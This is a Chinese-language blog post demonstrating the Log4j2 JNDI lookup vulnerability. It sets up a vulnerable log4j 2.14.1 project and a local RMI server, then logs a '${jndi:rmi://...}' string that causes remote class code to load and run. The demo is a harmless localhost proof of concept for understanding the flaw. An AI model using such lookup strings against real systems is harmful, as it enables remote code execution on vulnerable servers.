Log4j2漏洞Demo

Posted on

背景

近期Log4j2爆出了很严重的漏洞,具体信息也可以参考这里

测试

构建一个最简单的Java应用,并引入Log4j2的依赖(2.15.0以前的版本都中招了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<groupId>name.chengchao</groupId>
	<artifactId>log4jtest</artifactId>
	<version>0.0.1-SNAPSHOT</version>
	<dependencies>
		<dependency>
			<groupId>org.apache.logging.log4j</groupId>
			<artifactId>log4j-api</artifactId>
			<version>2.14.1</version>
		</dependency>
		<dependency>
			<groupId>org.apache.logging.log4j</groupId>
			<artifactId>log4j-core</artifactId>
			<version>2.14.1</version>
		</dependency>
	</dependencies>
</project>

由于这次的漏洞主要是lookup功能引起的,这里演示一下jndi的rmi调用.

先构造一个RMI服务并注册到本机

1
2
3
4
5
6
7
8
9
10
package log4jtest;
import java.io.Serializable;
import java.rmi.Remote;

public class TimeServer implements Remote, Serializable {
    private static final long serialVersionUID = 1L;
    static {
        System.out.println("!!!TimeServer static invoked!!!");
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
package log4jtest;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {

    public static void main(String[] args) throws Exception {
        TimeServer timeserver = new TimeServer();
        Registry registry = LocateRegistry.createRegistry(1099);
        registry.bind("time", timeserver);
        System.out.println("Timeserver registry");
        Thread.sleep(1000000);
    }

}

这样在本机就起了一个RMI的服务,监听端口是默认的1099

在业务代码里测试一下效果,非常简单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
package log4jtest;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jTest {

    public static void main(String[] args) throws Exception {
        Logger logger = LogManager.getLogger();
        String name = "${jndi:rmi://127.0.0.1:1099/time}";
        logger.error("hello:{}", name);
        Thread.sleep(10000);
    }
}
  1. 启动RMIServer
  2. 执行log4jtest.Log4jTest.main
  3. 就能看到TimeServer的代码被加载到本地,而且被执行了
1
2
!!!TimeServer static invoked!!!
10:22:56.343 [main] ERROR log4jtest.Log4jTest - hello:log4jtest.TimeServer@6bb4dd34